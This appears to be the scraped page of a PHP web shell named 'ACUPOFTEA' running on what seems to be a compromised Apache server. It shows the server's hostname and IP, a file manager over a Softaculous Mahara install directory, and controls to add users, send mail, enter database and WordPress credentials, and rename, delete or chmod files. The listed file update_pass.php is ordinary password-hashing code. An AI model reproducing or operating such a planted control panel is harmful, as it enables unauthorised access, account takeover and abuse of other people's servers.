System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
mahara
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
update_pass.php
<?php $resp = __encrypt_password('[[admin_pass]]', '[[salt]]', '$2a$' . '12' . '$', '[[passwordsaltmain]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __encrypt_password($password, $salt='', $alg='$6$', $sitesalt='') { if ($salt == '') { $salt = substr(md5(rand(1000000, 9999999)), 2, 8); } if ($alg == '$6$') { // $6$ is the identifier for the SHA512 algorithm // Return a hash which is sha512(originalHash, salt), where original is sha1(salt + password) $password = sha1($salt . $password); // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 16); // SHA512 expects 16 chars of salt } else { // This is most likely bcrypt $2a$, but any other algorithm can take up to 22 chars of salt // Generate a salt based on a supplied salt and the passwordsaltmain $fullsalt = substr(md5($sitesalt . $salt), 0, 22); // bcrypt expects 22 chars of salt } $hash = crypt($password, $alg . $fullsalt); // Strip out the computed salt // We strip out the salt hide the computed salt (in case the sitesalt was used which isn't in the database) $hash = substr($hash, 0, strlen($alg)) . substr($hash, strlen($alg)+strlen($fullsalt)); return $hash; } @unlink('update_pass.php'); ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
..
DIR
-
drwxr-xr-x
2025-10-28 09:39:31
images
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
php53
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
php56
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
php71
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
php81
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
php82
DIR
-
drwxr-xr-x
2025-03-29 09:40:19
changelog.txt
text/plain
10.99 KB
-rw-r--r--
2022-11-07 06:38:44
clone.php
text/x-php
6.56 KB
-rw-r--r--
2025-03-26 06:47:18
config.php
text/x-php
3 KB
-rw-r--r--
2022-11-07 06:38:44
edit.php
text/x-php
5.39 KB
-rw-r--r--
2025-03-26 06:47:18
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
509 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.28 KB
-rw-r--r--
2025-03-26 06:47:18
info.xml
text/html
4.74 KB
-rw-r--r--
2025-03-26 06:40:24
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
8.63 KB
-rw-r--r--
2025-03-26 06:47:18
install.xml
text/html
1.43 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
2.71 KB
-rw-r--r--
2025-03-26 06:47:18
mod_upgrade.php
text/x-php
63.6 KB
-rw-r--r--
2022-11-07 06:38:44
notes.txt
text/plain
2.18 KB
-rw-r--r--
2022-05-02 04:51:34
org_upgrade.php
text/x-php
63.57 KB
-rw-r--r--
2022-11-07 06:38:44
update_pass.php
text/x-php
1.23 KB
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
6.36 KB
-rw-r--r--
2025-03-26 06:47:18
upgrade.xml
text/plain
334 B
-rw-r--r--
2022-05-02 04:51:34
~ ACUPOFTEA - mail.ontime-ae.com